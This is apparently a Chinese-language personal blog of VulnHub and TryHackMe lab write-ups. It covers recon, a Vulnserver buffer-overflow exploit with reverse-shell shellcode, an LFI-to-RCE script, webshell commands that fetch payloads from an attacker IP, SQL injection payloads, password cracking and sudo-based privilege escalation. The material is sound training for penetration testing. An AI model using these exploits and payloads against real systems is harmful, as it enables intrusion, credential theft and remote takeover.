yash:x:1002:1002:,,,:/home/yash:/bin/bash

看起來有興趣的使用者cyber
yash讀取原始碼- php://filter/convert.base64-encode/resource=/var/www/html/acc.php
找到註解上的密碼//MY CREDS :- cyber:super#secure&password!

SSH

順利連上取得 Base Flag-

提權

起手式 sudo -l
發現可以用 root 執行一個 run.py``run.py-
但我們沒有權限讀取他 QQ觀察原始碼- admin.php找到 mysql 的帳密Dump Mysql- mysqldump -u root -h 127.0.0.1 -p details > a.sql
看到一組密碼
I_know_my_password但好像就沒有什麼進展了 QQ跑 Linpeas-
發現 Linux Kernel 好像有點舊，可以用 Exploit
https://www.exploit-db.com/exploits/37292試著載下來編譯執行-
就成功 Root ㄌFlag2- Root Flag-

另外一種提權法

剛剛可以用 sudo 執行 run.py但是沒有權限可以讀取但因為這是我的家目錄，所以我可以改檔名、新增檔案- 所以自己創一個 run.py- import os
os.system("/bin/bash")再 sudo 它-
也可以順利提權

學到ㄌ

%00 截斷
XXE 記得加 ;

Hack Me Please (VulnHub Writeup)

Thu, 02 Sep 2021 23:11:00 +0800

URL : https://www.vulnhub.com/entry/hack-me-please-1,731/

IP : 192.168.1.111

Recon

掃 Portrustscan -a 192.168.1.111nmap -A -p80,3306,33060 192.168.1.111- 掃 Dir- python3 dirsearch.py -u http://192.168.1.111/
看不出啥特別ㄉ觀察首頁- 觀察 main.js-
發現註解寫了一個 /seeddms51x/seeddms-5.1.22 的路徑

DMS

掃路徑發現有 install 等資訊觀察原始碼-
到 SorceForge 下載原始碼觀察路徑-
發現路徑內有 /conf/ 可能有重要的資訊/conf/settings.xml 可以存取- 裡面找到 mysql 的帳密 seeddms

MySQL

進行 MySQL 連線觀察 DB- 觀察表格- users-
找到一組帳密saket
saurav
Saket@#$1337但登入 DMS 失敗找到 tblUsers-
分析 hash
應該是 md5哈希貓爆破-
爆不出來QQ自己創一個使用者 mysql INSERT INTO tblUsers (id,login,pwd,fullName,email,role,language,theme,comment) VALUES (3,"meow","4a4be40c96ac6314e91d93f38043a634","Meow","meow@meow.meow",1,"en_US",0,0);-
可以登入，但畫面是白的 QQ改使用者密碼- 原本是 f9ef2c539bad8a6d2f3432b6d49ab51a先存著備用，怕以後要用到update tblUsers set pwd='4a4be40c96ac6314e91d93f38043a634' where id=1;-
就登入成功ㄌ上傳 webshell因為 seeddms51x 目錄沒有鎖權限- 根據觀察，檔案會存在 http://192.168.1.111/seeddms51x/data/1048576/{檔案ID}/1.{檔案附檔名}載 Reverse shell- http://192.168.1.111/seeddms51x/data/1048576/4/1.php?A=wget%20192.168.1.109:8000/s_l接上 Reverse shell- 使用交互式python3 -c 'import pty; pty.spawn("/bin/bash")'切換使用者-
使用當初 DB 看到的密碼提權- sudo -l 發現可以直接成為 root

Buffer Overflow Prep OVERFLOW1

Fri, 27 Aug 2021 23:39:00 +0800

https://tryhackme.com/room/bufferoverflowprep

Immunity debugger 快捷鍵Ctrl + F2 重開
F9 開始

觀察

nc 上去，決定這次的目標是 OVERFLOW1

Fuzz

準備 Overflow1.spk

s_readline();
s_string("OVERFLOW1 ");
s_string_variable("0");

執行 generic_send_tcp 192.168.1.102 1337 Overflow1.spk 0 0
Run 下去他就爛ㄌ
可以觀察到 EIP 變成 41414141

Cyclic 找 Offset

from pwn import *
r = remote("192.168.1.102",1337)

perfix = b"OVERFLOW1 "
cy = cyclic()

payload = perfix + cy

r.sendline(payload)

這題因為長度OK所以可以這樣做正常解法建議先 b'a'*1000
先 try 到 offset 蓋到 EIP 變成 0x6161611000 , 5000 之類的亂猜
因為有時候蓋太多他也會爛到 EIP 不變 QQ之後 cyclic(長度)，就可以產出指定的長度觀察 EIP 變成 61757461- pwn cyclic -l 0x61757461-
Offset 為 1978重新測試

from pwn import *
r = remote("192.168.1.102",1337)

perfix = b"OVERFLOW1 "
padding = b'a' * 1978

payload = perfix + padding + b'bbbb'

r.sendline(payload)

Vulnserver (TRUN) Windows Overflow

Wed, 25 Aug 2021 23:36:00 +0800

事前準備

Vulnserverhttps://github.com/stephenbradshaw/vulnserver
這邊我的環境是開在 Microsoft Windows 10 專業版 10.0.19042 (沒有用 VM)
關閉 Windows DefenderImmunity Debugger- 安裝 Moma 的 Script把 moma.py 直接丟進 C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands 即可Kali- 安裝 pwntools
其他都有內建

簡介指令

cyclicpwntools 功能 (我覺得用起來比較順手)pwn cyclic或是在 python 裡面的 pwn.cyclic()
可以產出 cyclic 字串
pwn cyclic -l {Pattern in hex}- 隨便取 4 個值，都能知道他 offset 第幾格
msf 功能- /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l {length}產出長度為 length 的字串/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l {length} -q {pattern}- Fuzz 腳本- generic_send_tcp {IP} {Port} {腳本.spk} 0 0

s_readline();
s_string("{command}"); // 開頭要輸入的東西
s_string_variable("0");

觀察

第一步，nc 上去觀察這次要打ㄉ洞是 TRUN- 基本指令是 TRUN {something}

Fuzz

所以寫 TRUN 的 generic_send_tcp 的 Script trun1.spk

s_readline();
s_string("TRUN "); // 開頭要輸入的東西
s_string_variable("0");

執行generic_send_tcp 192.168.1.102 9999 trun1.spk 0 0
Run 下去隔了幾秒鐘， Debugger 就跳卡住了-
下面有寫是 0x41414141 位子錯誤
然後可以發現 EIP 也被變成了 0x41414141
0x41 是 A觀察 EAX- 發現 Command 的開頭是 TRUN /.:/AAA....
只是我們不知道 Fuzz 有戳幾個 A
但確定他的開頭是 TRUN /.:/

Cyclic 找 Offset

用 cyclic 找 offset from pwn import * r = remote("192.168.1.102",9999) command = b"TRUN /.:/" cyclic_code = cyclic() payload = command + cyclic_code r.sendline(payload)
觀察 EIP
值為 0x61616275輸入 pwn cyclic -l 0x61616275-
就能知道 offset 是 2003測試 Offset 是否正確- 這邊用 0xdeadbeef 進行測試from pwn import * r = remote("192.168.1.102",9999) command = b"TRUN /.:/" padding = b'a'*2003 meow = p32(0xdeadbeef) payload = command + padding + meow r.sendline(payload)- 發現可以成功蓋到 EIP 了

觀察蓋完 EIP 後

觀察蓋完 EIP 後的東東 from pwn import * r = remote("192.168.1.102",9999) command = b"TRUN /.:/" padding = b'a'*2003 new_eip = p32(0xdeadbeef) padding2 = cyclic() payload = command + padding + new_eip + padding2 r.sendline(payload)
一樣用 cyclic
會發現 ESP 指向 aaaa
也就是 0x61616161
就是說，我們的 address 後面直接接的東西會被 EIP 所指到

找 Shell Code 跳躍點

理論上我們在目前寫的後面 shell_code並且把 new_eip 設定為 jmp ESP 即可在 immunity debugger 下面輸入- !mona jmp -r esp 可以找到 jmp ESP 的指令
第一個在 0x625011af所以我們把 EIP 蓋成這個，他接下來就會跳去 EIP 指到的 Memory- 並且執行我們的 Shell Code

生 Reverse shell

接著要想辦法生成 reverse shell 的 shell code
這邊可以直接用 msfvenom 處理msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.106 LPORT=7877 EXITFUNC=thread -f c -a x86 -b "\x00"
整理一下貼到 Python再在前面增加幾個 nop (0x90)做 padding- 避免直接跳出現一些問題
Padding 長度以 32bit 的倍數為原則
padding2 = p32(0x90909090) * 10

完整 Exploit

from pwn import *

r = remote("192.168.1.102",9999)
command = b"TRUN /.:/"
padding = b'a'*2003
new_eip = p32(0x625011af)
padding2 = p32(0x90909090) * 10
shellcode = (b"\xbe\xb0\x17\xe4\xba\xda\xcc\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
b"\x52\x31\x70\x12\x03\x70\x12\x83\x70\x13\x06\x4f\x8c\xf4\x44"
b"\xb0\x6c\x05\x29\x38\x89\x34\x69\x5e\xda\x67\x59\x14\x8e\x8b"
b"\x12\x78\x3a\x1f\x56\x55\x4d\xa8\xdd\x83\x60\x29\x4d\xf7\xe3"
b"\xa9\x8c\x24\xc3\x90\x5e\x39\x02\xd4\x83\xb0\x56\x8d\xc8\x67"
b"\x46\xba\x85\xbb\xed\xf0\x08\xbc\x12\x40\x2a\xed\x85\xda\x75"
b"\x2d\x24\x0e\x0e\x64\x3e\x53\x2b\x3e\xb5\xa7\xc7\xc1\x1f\xf6"
b"\x28\x6d\x5e\x36\xdb\x6f\xa7\xf1\x04\x1a\xd1\x01\xb8\x1d\x26"
b"\x7b\x66\xab\xbc\xdb\xed\x0b\x18\xdd\x22\xcd\xeb\xd1\x8f\x99"
b"\xb3\xf5\x0e\x4d\xc8\x02\x9a\x70\x1e\x83\xd8\x56\xba\xcf\xbb"
b"\xf7\x9b\xb5\x6a\x07\xfb\x15\xd2\xad\x70\xbb\x07\xdc\xdb\xd4"
b"\xe4\xed\xe3\x24\x63\x65\x90\x16\x2c\xdd\x3e\x1b\xa5\xfb\xb9"
b"\x5c\x9c\xbc\x55\xa3\x1f\xbd\x7c\x60\x4b\xed\x16\x41\xf4\x66"
b"\xe6\x6e\x21\x28\xb6\xc0\x9a\x89\x66\xa1\x4a\x62\x6c\x2e\xb4"
b"\x92\x8f\xe4\xdd\x39\x6a\x6f\x22\x15\x75\x05\xca\x64\x75\xc7"
b"\xcf\xe0\x93\x9d\xdf\xa4\x0c\x0a\x79\xed\xc6\xab\x86\x3b\xa3"
b"\xec\x0d\xc8\x54\xa2\xe5\xa5\x46\x53\x06\xf0\x34\xf2\x19\x2e"
b"\x50\x98\x88\xb5\xa0\xd7\xb0\x61\xf7\xb0\x07\x78\x9d\x2c\x31"
b"\xd2\x83\xac\xa7\x1d\x07\x6b\x14\xa3\x86\xfe\x20\x87\x98\xc6"
b"\xa9\x83\xcc\x96\xff\x5d\xba\x50\x56\x2c\x14\x0b\x05\xe6\xf0"
b"\xca\x65\x39\x86\xd2\xa3\xcf\x66\x62\x1a\x96\x99\x4b\xca\x1e"
b"\xe2\xb1\x6a\xe0\x39\x72\x8a\x03\xeb\x8f\x23\x9a\x7e\x32\x2e"
b"\x1d\x55\x71\x57\x9e\x5f\x0a\xac\xbe\x2a\x0f\xe8\x78\xc7\x7d"
b"\x61\xed\xe7\xd2\x82\x24")

payload = command + padding + new_eip + padding2 + shellcode

r.sendline(payload)

本地端開 nc 接 Shell成功!!

參考資料

Windows Fundamentals 1 (Try Hack Me Writeup)

Tue, 24 Aug 2021 13:30:00 +0800

URL : https://tryhackme.com/room/windowsfundamentals1xbx

Task 1 Introduction to Windows

可以用 RDP 之類的方法進入 Windows預設帳號 : administrator
預設密碼 : letmein123!但我直接用 THM 提供的 web RDP 介面-

Task 2 Windows Editions

Home 版本跟 Pro 的差別可以使用 BitLocker
可以使用 WIP
https://www.microsoft.com/en-us/windows/compare-windows-10-home-vs-proWhat encryption can you enable on Pro that you can’t enable in Home?- A: BitLocker

Task 3 The Desktop (GUI)

Which selection will hide/disable the Search box?
HiddenWhich selection will hide/disable the Task View button?-
Show Task View buttonBesides Clock, Volume, and Network, what other icon is visible in the Notification Area?-
action center

Task 4 The File System

檔案系統FAT16 / FAT32File Allocation Table
USB 裝置之類ㄉ還是看ㄉ到HPFS- High Performance File SystemNTFS- New Technology File SystemNTFS 優勢- 文件紀錄系統，可以自動修復日誌
單檔案 >= 4G
可以針對資料夾跟黨按設定權限
資料夾跟檔案的壓縮
加密 (Encryption File System, EFS)NTFS 權限- Read對資料夾：可以觀看，跟顯示資料夾中的檔案與子資料夾
對檔案：可以觀看或存取檔案的內容Write- 對資料夾：可以在資料夾中增加檔案或子資料夾
對檔案：可以對檔案進行寫入Read & Execute- 對資料夾：可以觀看，顯示資料夾中的檔案與子資料夾；可以直行檔案，會繼承給檔案以及資料夾
對檔案：可以觀看、存取檔案的內容，也可以直行黨按List folder contents- 對資料夾：可以觀看，並列出檔案以及子資料夾，以及執行檔案，只能給資料夾繼承Modify- 對資料夾：可以讀取、寫入檔案以及子資料夾；允許刪除資料夾
對檔案：可以讀取，寫入檔案；允許刪除檔案Full Control- 對資料夾，允許讀取、寫入、變更以及刪除檔案與子資料夾
對檔案：允許讀取、寫入、變更予刪除檔案

Alternate Data Streams (ADS)

一種 NTFS 的 attribute
每一個檔案至少都會有一個 Data Stream ($DATA)
ADS 允許一個檔案包含多個 Data Stream
Windows Explorer 不會對使用者顯示 ADS，需要透過特定的第三方軟體或是 Powershell
所以有時候 Malware 會使用 ADS 來隱藏資料
延伸閱讀 https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
範例建立一個 ADS 的東東用 Dir 看不出來- 用 Type 也看不出來- 可以用 powershell GET-Item -path C:\Users\Administrator\Desktop\example -stream *- CMD 需要裝 Sysinternals 的 Streams- https://docs.microsoft.com/zh-tw/sysinternals/downloads/streamsWhat is the meaning of NTFS?- New Technology File System

Task 5 The Windows\System32 Folders

%windir%最常見的位子在 C:\Windows
裡面存放著作業系統，但他不一定需要在 C，也有一些喪心病狂的人會把他設定在其他地方
所以我們可以使用環境變數，或是說系統環境變數(System environment variables) 來正確的訪問System32- 資料夾中有許多對作業系統來說很重要的檔案
在變動、刪除時要特別小心，很可能讓系統爛掉What is the system variable for the Windows folder?- %windir%

Task 6 User Accounts, Profiles, and Permissions

兩種類型的帳戶Administrator增、刪使用者
修改 Group
修改作業系統設定Standard User- 修改與該使用者相關的資料夾、檔案的屬性
不能做系統層級的修改，例如安裝軟體使用者家目錄- C:\Users\{Username}
預設會有Desktop
Documents
Downloads
Music
PicturesLocal User and Group Management- lusrmgr.msc
可以看到各種使用者、群組的資訊What is the name of the other user account?- tryhackmebillyWhat groups is this user a member of?-
Remote Desktop Users,UsersWhat built-in account is for guest access to the computer?- GuestWhat is the account status?-
Account is disabled

Task 7 User Account Control

UACUser Account ControlVista 後開始使用的可以觀察到一個安裝檔案可能並沒有使用者相關的權限- 登入一個普通使用者- tryhackmebilly / window$Fun1!
10.10.229.121
會發現多出盾牌 icon如果執行安裝- 會需要輸入 Administrator 的密碼
What does UAC mean?- User Account Control

Task 8 Settings and the Control Panel

Win8 後出現 Settings 頁面舊版控制台 (Control Panel)- In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?-
右上角選 small icons
最後一個選項是 Windows Defender Firewall

Task 9 Task Manager

What is the keyboard shortcut to open Task Manager?ctrl+shift+esc
哇酷，我還真不知道有這種東西呢

Task 10 Conclusion

喵喵

VulnNet (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:28:00 +0800

URL : https://tryhackme.com/room/vulnnet1
IP : 10.10.86.144

題目敘述You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts

Recon

掃 Portrustscan -a 10.10.86.144 -r 1-65535nmap -A -p22,80 10.10.86.144- 掃目錄- python3 dirsearch.py -u http://10.10.86.144/
發現登入頁面-
戳了常見的 SQLi 都不行觀察網頁連結- 透過 js formatter 轉漂亮- broadcast.vulnnet.thm
加到 /etc/hosts前面的階段也可以用 LinkFinder- python3 linkfinder.py -i http://vulnnet.thm/python3 linkfinder.py -i http://vulnnet.thm/js/index__d8338055.js-
發現首頁可以帶一個 ?referer 參數訪問 broadcast.vulnnet.thm-
發現需要登入觀察首頁 referer 參數- 發現可以 LFI用 Session upload progress 大法

import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://vulnnet.thm/index.php'
param = "referer"

#code = "file_put_contents('/tmp/shell.php','& /dev/tcp/10.13.21.55/7877 0>&1'");'''

while True:
 req = [grequests.post(base_url,
 files={'f': "A"*0xffff},
 data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:"},
 cookies={'PHPSESSID': sess_name}),
 grequests.get(f"{base_url}?{param}={sess_path}")]

 result = grequests.map(req)
 if "pwned" in result[1].text:
 print(result[1].text)
 break

然後就 RCE 了
(感覺就不是正規解…ㄏㄏ

提權

python3 -c 'import pty; pty.spawn("/bin/bash")'
掃豌豆
找到 backup觀察 backup 檔案，發現有 ssh-backup-
偷出來解壓縮-
發現是 id_rsa到家目錄看使用者名稱-
server-management發現是 server-management準備 ssh 登入-
發現 id_rsa 需要密碼 QQ用約翰爆破- python3 ../../ssh2john.py id_rsa > id_rsa_john
密碼是 oneTWO3gOyacSSH 登入-
取得 user flag跑豌豆掃到 .htpasswd 密碼的 hash- 猜測應該是給 broadcast.vulnnet.thm 用的
用約翰爆破個
密碼是 ``9972761drmfsls猜測原始思路正規解法應該是 LFI 到這個檔案訪問 broadcast.vulnnet.thm- 使用帳號 developers![](/uploads/2022/02/7cb34-jR4k1zC.png)密碼 9972761drmfsls`- 推測這應該是某個有 RCE 洞的 CMS
正規解是從這邊進 RCE ㄅ
隨便

二次提權

想起前面的 Backup 用了 tar *所以可以快速提權
接 Shell- 取 Root Flag-

Sustah (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:26:00 +0800

URL : https://tryhackme.com/room/sustah

IP : 10.10.252.122

Recon

掃 Portrustscan -a 10.10.252.122 -r 1-65535nmap -A -p22,80,8085 10.10.252.122-
gunicorn 20.0.4觀察首頁-
啥都ㄇ有
掃目錄
也沒東西觀察 8085 port-
看起來像是幸運轉盤
掃目錄
有一個 ping 他只會回 pong

爆數字

下面有一個猜數字遊戲
他說我有 0.004% 的勝率
先測一下能不能爆破

from bs4 import BeautifulSoup
import requests

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Content-Type': 'application/x-www-form-urlencoded',
 'Origin': 'http://10.10.252.122:8085',
 'Connection': 'keep-alive',
 'Referer': 'http://10.10.252.122:8085/home',
 'Upgrade-Insecure-Requests': '1',
}

data = {
 'number': '123'
}

for i in range(100):
 response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data)
 soup = BeautifulSoup(response.text,'html.parser')
 try:
 print(soup.find('h3').text)
 except:
 print(soup)

發現次數過多他會噴{"error":"rate limit execeeded"}
試了很多次發現- 帶 ‘X-Remote-Addr’ : ‘127.0.0.1’
就不會噴錯了計算一下- 1/(0.004%) = 25000
所以猜測密碼在這之間
寫腳本來爆一下

from bs4 import BeautifulSoup
import requests
from multiprocessing import Process, Pool

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Content-Type': 'application/x-www-form-urlencoded',
 'Origin': 'http://10.10.252.122:8085',
 'Connection': 'keep-alive',
 'Referer': 'http://10.10.252.122:8085/home',
 'Upgrade-Insecure-Requests': '1',
 'X-Remote-Addr' : '127.0.0.1'
}

l = [i for i in range(25000)]

def meow(num):
 data = {
 'number': num
 }

 response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data)
 soup = BeautifulSoup(response.text,'html.parser')
 try:
 s = soup.find('h3').text
 if 'Oh no!' not in s:
 print(num,s)
 except:
 print(soup , response.status_code)
p = Pool(200)
p.map(meow,l)

幾秒鐘就爆出來ㄌ
10921他回應我這個 /YouGotTh3P@th/- 加到 80 port 的 Path 上面會出現一個 CMS-

CMS

發現他是 Mara CMS
預設可以用 admin / changeme 進行登入登入完還要我趕快改密碼- 查詢相關 Exploit- https://www.exploit-db.com/exploits/48780
目測是可以直接傳 webshell那就給他直接傳下去ㄅ- 還真的可以- http://10.10.252.122/YouGotTh3P@th/img/webshell.php?A=wget 10.13.21.55:8000/s -O /tmp/s戳 reverse shell

提權

python3 -c "import pty;pty.spawn('/bin/bash')"
試著用 LSEbash lse.sh -l1
看不出什麼東西 QQ發現 find 指令被封鎖 QWQ- 提示說去找備份檔案
網路上看到兩種解法tar cf - $PWD 2>/dev/null | tar tvf - | grep backup慢du -a 2>/dev/null | grep backup- 快就找到了 /usr/backups- 觀察發現有一個隱藏檔 .bak.passwd-
解開來看獲得帳號密碼- kiran / trythispasswordforuserkiran透過 su 切過去- 取得 User Flag-

二次提權

起手式 sudo -l使用豌豆-
發現有一個 doas 酷指令，可以不用 suid 或 sudo去 GTFOBins 尋找 rsync to shell- https://gtfobins.github.io/gtfobins/rsync/#suid
doas rsync -e 'sh -p -c "sh 0&2"' 127.0.0.1:/dev/null
成功提權取得 Root Flag-

Madeye Castle (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:06:00 +0800

URL : https://tryhackme.com/room/madeyescastle

IP : 10.10.150.136

Recon

掃 Portrustscan -a 10.10.150.136 -r 1-65535Open 10.10.150.136:22
Open 10.10.150.136:80
Open 10.10.150.136:139
Open 10.10.150.136:445nmap -A -p22,80,139,445 10.10.150.136- 掃路徑- python3 dirsearch.py -u http://10.10.150.136backup/觀察首頁-
比起 Apache Default Page 好像多了一個 Logo
但是他死ㄌ嘗試 smb- smbclient -N '//10.10.150.136/sambashare'
匿名登入- 下載檔案- 觀察檔案
感覺很像某種字典檔- 另外一個檔案
感覺有某些提示， Hagrid 可能用 rockyou 的密碼嘗試 Hydra 爆密碼- hydra -L user.txt -P spellnames.txt hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:Incorrect Username or Password"
感覺很慢，沒效率，先放著丟一邊觀察首頁的註解-
看起來可以改 /etc/hosts用 domain name 來訪問首頁-
看起來是可以輸入帳號密碼的頁面掃路徑-
看起來沒啥東西

SQLi

嘗試 SQLi亂輸入會噴 500 錯誤先複製 curl- curl 'http://hogwartz-castle.thm/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://hogwartz-castle.thm' -H 'Connection: keep-alive' -H 'Referer: http://hogwartz-castle.thm/' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'user=aa&password=bb'可以戳 Union- 'union select 1,2,3,4 --
測了一些 version 之類的東東都發現不行- 才發現他是 SQLite
‘union select sqlite_version(),2,3,4 –
SQLite 爆表- 'union select name,2,3,4 from sqlite_master WHERE type='table' --
發現只有一張 users 的 table爆 Column- 'union select sql,2,3,4 from sqlite_master WHERE type='table' --
name
password
admin
notes選使用者- 'union select group_concat(name),2,3,4 from users --
選 admin- 爆使用者跟密碼組-

import requests

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Content-Type': 'application/x-www-form-urlencoded',
 'Origin': 'http://hogwartz-castle.thm',
 'Connection': 'keep-alive',
 'Referer': 'http://hogwartz-castle.thm/login',
 'Upgrade-Insecure-Requests': '1',
}

# 'union select 1,2,3,4 --

for i in range(1,40):
 data = {
 'user': f"'union select name || ':' || password,2,3,4 from users limit {i},1 --",
 'password': '123'
 }

 response = requests.post('http://hogwartz-castle.thm/login', headers=headers, data=data)

 name = response.text[27:-19]

 print(name)

取的所有的 hash分析 hash 格式-
SHA 512用哈希貓-
hashcat -m 1700 hashes.txt spellnames.txt
hashcat -m 1700 hashes.txt /opt/rockyou.txt
發現基本上都爆不出來觀察 notes- 'union select group_concat(notes),2,3,4 from users --
發現密碼用ㄌ best64查詢哈希貓 best64 的用法- https://github.com/hashcat/hashcat/blob/master/rules/best64.rule
hashcat -m 1700 hashes.txt /opt/rockyou.txt -r best64.rule
成功爆出來密碼b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885:wingardiumleviosa123回來用 SQLi 找使用者看看- 'user': "'union select name,2,3,4 from users where password like 'b326e7a6%' --
Harry Turner觀察他的 notes- "'union select notes,2,3,4 from users where password like 'b326e7a6%' --
使用 first name

SSH

ssh harry@hogwartz-castle.thm密碼： wingardiumleviosa123
登入成功

提權

sudo -l
發現一個叫做 pico 的程式
可以用 hermonine 執行 pico執行看看-
發現打開是 nano尋找利用方式- https://gtfobins.github.io/gtfobins/nano/#sudo
sudo -u hermonine /usr/bin/pico
^R^X
reset; sh 1>&0 2>&0
成功橫向移動成功取得 User Flag-

二次提權

發現使用者根目錄有 .python_history
看起來是有用過 pwntools 的遺跡python -c 'import pty; pty.spawn("/bin/bash")'- 增加互動性跑豌豆-
找到一個奇妙的，有 suid 的檔案/srv/time-turner/swagger直接執行-
看起來是猜數字遊戲丟進 ida-
看起來是用 timestamp 當 random seed
我們可以自己編譯一個程式，餵入當前時間date +%s ; /srv/time-turner/swagger- 可以取得當前 timestamp ，並執行程式編譯自己的 C 語言程式，給予指定的 timestamp- 填上去！-
成功，發現他會呼叫沒有絕對路徑的 uname所以可以蓋 path-
/bin/date +%s ;PATH=/home/hermonine/fakepath:$PATH /srv/time-turner/swagger
就成功 root 了取得 Root Flag-
RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}

Looking Glass (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:05:00 +0800

URL : https://tryhackme.com/room/lookingglass

IP : 10.10.150.136

Recon

掃 portrustscan -a 10.10.150.136 -r 1-65535
三小 ?_?
先看看比較特別的 22 port
也沒啥特別ㄉrustscan -a 10.10.150.136 -r 1-65535 --accessible | tee rustscan.txt- 存成檔案用 curl 觀察-
用 nmap 觀察- nmap -sV -p9001,9011,9003,9000,9009,9006,9005,9004,9015,9008,9007,9013,9017,9002,9010,9012,9020,9014,9019,9016,9024,9018,9027,9026,9034,9025,9023,9021,9022,9033,9035,9039,9030,9029,9051,9031,9045,9040,9052,9028,9042,9038,9041,9032,9048,9044,9043,9037,9049,9036,9059,9047,9050,9058,9057,9054,9053,9061,9056,9046,9064,9055,9062,9071,9060,9063,9068,9067,9066,9065,9075,9074,9073,9072,9070,9069,9081,9076,9080,9082,9078,9079,9091,9089,9077,9085,9101,9088,9086,9083,9100,9084,9095,9099,9093,9087,9090,9094,9096,9092,9097,9098,9103,9105,9104,9102,9107,9106,9109,9114,9110,9108,9115,9111,9113,9112,9117,9121,9116,9119,9120,9118,9122,9123,9127,9126,9131,9125,9130,9129,9124,9128,9132,9133,9135,9134,9137,9136,9138,9143,9140,9141,9142,9158,9155,9154,9147,9149,9145,9139,9161,9167,9156,9148,9168,9150,9146,9164,9166,9165,9177,9157,9152,9144,9162,9151,9174,9153,9172,9159,9178,9173,9171,9179,9160,9180,9163,9169,9184,9189,9193,9186,9170,9195,9176,9185,9175,9181,9182,9204,9192,9183,9190,9191,9202,9194,9197,9200,9206,9196,9209,9208,9188,9187,9215,9203,9198,9199,9205,9201,9213,9217,9216,9210,9214,9212,9211,9219,9218,9207,9220,9221,9222,9223,9225,9224,9228,9226,9227,9231,9229,9230,9232,9233,9234,9235,9236,9238,9237,9247,9240,9241,9248,9250,9253,9243,9239,9245,9242,9252,9251,9254,9246,9244,9249,9255,9258,9259,9256,9257,9267,9260,9262,9264,9263,9266,9261,9265,9268,9270,9273,9274,9271,9269,9276,9275,9272,9277,9283,9278,9285,9279,9284,9281,9280,9282,9286,9287,9289,9288,9290,9291,9293,9292,9294,9295,9297,9299,9296,9301,9303,9298,9300,9302,9304,9305,9306,9307,9308,9309,9310,9311,9316,9312,9314,9317,9313,9315,9318,9320,9321,9322,9324,9325,9323,9319,9329,9326,9331,9330,9328,9332,9327,9333,9334,9335,9337,9340,9338,9343,9344,9336,9342,9339,9345,9346,9341,9348,9350,9352,9347,9351,9349,9353,9356,9355,9358,9360,9354,9357,9364,9362,9359,9363,9367,9361,9365,9366,9375,9373,9369,9374,9368,9381,9380,9384,9371,9376,9377,9370,9372,9378,9382,9379,9385,9383,9389,9387,9388,9390,9393,9392,9386,9391,9394,9395,9396,9397,9398,9399,9400,9401,9412,9410,9408,9419,9417,9424,9402,9406,9420,9407,9415,9413,9414,9425,9405,9416,9418,9404,9411,9403,9409,9426,9421,9423,9427,9429,9422,9428,9430,9431,9432,9433,9434,9435,9442,9440,9437,9439,9441,9438,9436,9446,9450,9444,9443,9445,9447,9449,9448,9451,9454,9452,9453,9458,9455,9459,9456,9457,9463,9460,9461,9465,9462,9468,9464,9466,9467,9470,9469,9474,9473,9472,9477,9478,9471,9482,9476,9475,9480,9483,9479,9481,9485,9486,9484,9491,9487,9488,9489,9490,9493,9492,9494,9498,9499,9497,9496,9495,9502,9501,9500,9503,9505,9504,9508,9510,9507,9506,9509,9511,9512,9513,9514,9517,9519,9515,9516,9520,9518,9522,9527,9526,9528,9521,9525,9524,9530,9533,9523,9529,9534,9532,9531,9535,9536,9537,9539,9538,9540,9541,9545,9543,9542,9544,9546,9551,9549,9547,9554,9548,9555,9556,9557,9550,9558,9552,9553,9559,9561,9560,9562,9564,9565,9563,9568,9566,9569,9571,9567,9573,9574,9572,9575,9570,9576,9580,9577,9581,9579,9578,9582,9583,9584,9586,9585,9587,9589,9594,9588,9590,9592,9591,9593,9595,9601,9598,9600,9602,9599,9597,9596,9603,9609,9608,9607,9606,9610,9604,9615,9612,9619,9617,9605,9613,9621,9614,9611,9616,9620,9622,9618,9623,9644,9626,9627,9638,9633,9640,9629,9630,9624,9642,9634,9637,9636,9643,9632,9635,9625,9641,9647,9645,9639,9628,9631,9646,9648,9649,9650,9651,9653,9654,9652,9659,9657,9655,9658,9656,9660,9661,9663,9662,9664,9665,9666,9668,9667,9671,9669,9670,9672,9673,9675,9674,9676,9678,9677,9679,9680,9681,9682,9683,9684,9685,9686,9692,9689,9687,9693,9690,9688,9691,9694,9695,9698,9696,9699,9697,9700,9724,9725,9722,9737,9726,9723,9728,9721,9738,9727,9739,9736,9735,9740,9741,9742,9745,9744,9743,9747,9748,9750,9746,9752,9749,9754,9753,9751